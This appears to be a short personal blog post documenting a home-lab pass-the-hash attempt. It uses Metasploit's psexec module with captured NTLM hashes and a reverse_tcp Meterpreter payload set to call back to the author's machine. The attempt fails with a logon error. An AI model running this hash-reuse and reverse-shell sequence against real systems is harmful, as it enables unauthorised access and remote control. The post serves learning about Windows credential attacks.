Probably my favourite blog title so far.
Following on from the Hashdump post in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to login without the need for decryption:
msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server…
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ”…
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
As you can see this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.
No idea why.